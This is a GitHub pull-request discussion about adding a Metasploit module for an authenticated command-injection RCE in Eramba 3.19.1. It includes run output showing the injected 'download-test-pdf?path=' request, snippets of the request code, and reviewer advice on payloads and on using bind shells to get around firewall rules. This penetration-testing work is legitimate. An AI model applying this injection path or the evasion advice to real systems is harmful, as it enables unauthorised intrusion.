Add Eramba Remote Code Execution Exploit

[trvnt-stefan]

This PR add a new auxiliary module to exploit a RCE vulnerability in the web application Eramba.

Verification

1. Install the vulnerable Eramba version (3.19.1) (see Eramba Docker Install)
2. Enable Debug mode in the Eramba web application
3. Execute Metasploit script:

[*] Processing eramba.rc for ERB directives.
resource (eramba.rc)> use auxiliary/scanner/http/eramba_rce
resource (eramba.rc)> set RHOSTS 192.168.200.15
RHOSTS => 192.168.200.15
resource (eramba.rc)> set RPORT 8443
RPORT => 8443
resource (eramba.rc)> set USERNAME admin
USERNAME => admin
resource (eramba.rc)> set PASSWORD XXXYYYZZZ
PASSWORD => XXXYYYZZZ
resource (eramba.rc)> set COMMAND ls -la
COMMAND => ls -la
resource (eramba.rc)> run
[*] Running module against 192.168.200.15
[*] Retrieving CSRF token and session cookies...
[*] CSRF Token: uwAzmvLmg/nqp0FyMVfb8tNBZkb/zzG3Nky28Dr4/bNMAtyvDKdLqBMDzbMGyQROxZ3lQh10V1yAaR6lS35nRJyu3eFo1r4GtnBSdZv4A4YOdYXCCMuY1npnuM0+wnicJjGp0Wf5Mi/zrNV0KhVuOQ==
[*] Token Fields: c8bdd1a6b043b3dc109fe9564e2d55a26f684bd8%3A
[*] Token Unlocked: %7CmodalBreadcrumbs%7CmodalId
[*] Attempting to log in and redirect to command execution page...
[+] Login successful, redirected to command execution page.
[*] Session Cookies after cleaning: PHPSESSID=momnjit7odfjccqe4erho0j00t; translation=1;
[+] /settings/download-test-pdf?path=ls+-la;
[+] Command executed successfully. Response content:
total 88
drwxr-xr-x  9 www-data www-data  4096 Aug  7 13:59 .
drwxr-xr-x 17 www-data www-data  4096 Aug  7 13:59 ..
-rw-r--r--  1 www-data www-data   130 Oct 17  2022 .htaccess
-rw-r--r--  1 www-data www-data    11 Oct 17  2022 README.md
drwxr-xr-x  4 www-data www-data  4096 Aug  7 13:59 css
-rw-r--r--  1 www-data www-data  2529 Oct 17  2022 favicon.png
drwxr-xr-x  2 www-data www-data  4096 Aug  7 13:59 font
drwxr-xr-x  8 www-data www-data  4096 Aug  7 13:59 img
-rw-r--r--  1 www-data www-data  1387 Oct 17  2022 index.php
drwxr-xr-x 10 www-data www-data  4096 Aug  7 13:59 js
drwxr-xr-x  2 www-data www-data  4096 Aug  7 13:59 media
drwxr-xr-x  2 www-data www-data  4096 Aug  7 13:59 swagger
-rw-r--r--  1 www-data www-data    77 Oct 17  2022 test_pdf.html
-rw-r--r--  1 www-data www-data  6818 Oct 17  2022 test_pdf.pdf
drwxr-xr-x  4 www-data www-data  4096 Aug  7 13:59 tooltips
-rw-r--r--  1 www-data www-data   240 Oct 17  2022 updater_output.php
-rw-r--r--  1 www-data www-data 16901 Oct 17  2022 video-js.swf
[*] Auxiliary module execution completed

[Chocapikk]

Hello @trvnt-stefan , is there a reason to code this as an auxiliary rather than writing this as an exploit and creating a meterpreter session?

[Chocapikk]

Suggested change

	unless res && res.code == 200
	unless res&.code == 200

[Chocapikk]

Suggested change

	doc = Nokogiri::HTML(res.body)
	doc = res.get_html_document

[Chocapikk]

Suggested change

	if res && res.code == 302
	if res&.code == 302

[Chocapikk]

Suggested change

	if res && res.code == 500
	if res&.code == 500

[Chocapikk]

Suggested change

	command_encoded = URI.encode_www_form_component(datastore['COMMAND'].to_s)
	redirect_path = "/settings/download-test-pdf?path=#{command_encoded};"
	redirect_url = normalize_uri(target_uri.path, redirect_path.to_s)
	redirect_path = "/settings/download-test-pdf?path=#{URI.encode_www_form_component(datastore['COMMAND'])};"
	redirect_url = normalize_uri(target_uri.path, redirect_path)

[Chocapikk]

@trvnt-stefan

When adding a module to Metasploit, it's essential to also include the corresponding documentation. This helps other users and developers understand how to use and test the module. Please refer to the following guide to learn how to write module documentation: https://docs.metasploit.com/docs/development/quality/writing-module-documentation.html

[smcintyre-r7]

This should really be an exploit module delivering an ARCH_CMD payload. That would allow the user to open a session and start a handler automatically. We also have generic command payloads if the user wants full control over the command and need to, for example, execute whoami.

[ssmmkkxxzz]

We are considering developing an Exploit module in addition to the Auxiliary one. Please see my comment below for the reasons why.

[github-actions]

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

• Writing Module Documentation
• Template
• Examples

[ssmmkkxxzz]

Hello @trvnt-stefan , is there a reason to code this as an auxiliary rather than writing this as an exploit and creating a meterpreter session?

Yes, we see the following advantages in providing separate modules for all RCE vulnerabilities, one under Auxiliary and one under Exploit. Firstly, the pure RCE provides more opportunities for an attacker to remain less visible; secondly, the FW rules on the victim side can prevent outbound connections; also, the environments can be configured completely differently, which we have already experienced in the production and test environments.
We can therefore consider developing an Exploit module in addition to the Auxiliary one.

[Chocapikk]

Hello @ssmmkkxxzz, if I'm not mistaken, you can actually run system commands directly from the exploit module using a custom payload. For example, you can set cmd/unix/generic as the payload and define the command like this:

set payload cmd/unix/generic
set CMD "whoami"

This way, the command will be executed without needing an auxiliary module or a reverse shell. It's simpler and keeps everything within the exploit.

[jheysel-r7]

Hey @trvnt-stefan, just checking in, as we'd love to see this module landed into the framework.

I too would agree that it would likely be best as a single exploit module, to reduce code duplication and to follow to the existing convention of the framework.

As mentioned above an exploit module can use the cmd/unix/generic payload to send individual commands as desired by the msfconsole user.

Also, if outbound firewall rules and reverse shells are a concern, msfconsole users can select a bind shell payload (instead of a reverse shell) which will open an endpoint on the victim machine and allow an attacker to connect to it. This will appear as an inbound connection on the victim machine and might help bypass some of the FW rules mentioned.

Please let me know if you have any questions as I'd be happy to help.

[github-actions]

Thanks for your contribution to Metasploit Framework! We've looked at this pull request, and we agree that it seems like a good addition to Metasploit, but it looks like it is not quite ready to land. We've labeled it attic and closed it for now.

What does this generally mean? It could be one or more of several things:

• It doesn't look like there has been any activity on this pull request in a while
• We may not have the proper access or equipment to test this pull request, or the contributor doesn't have time to work on it right now.
• Sometimes the implementation isn't quite right and a different approach is necessary.

We would love to land this pull request when it's ready. If you have a chance to address all comments, we would be happy to reopen and discuss how to merge this!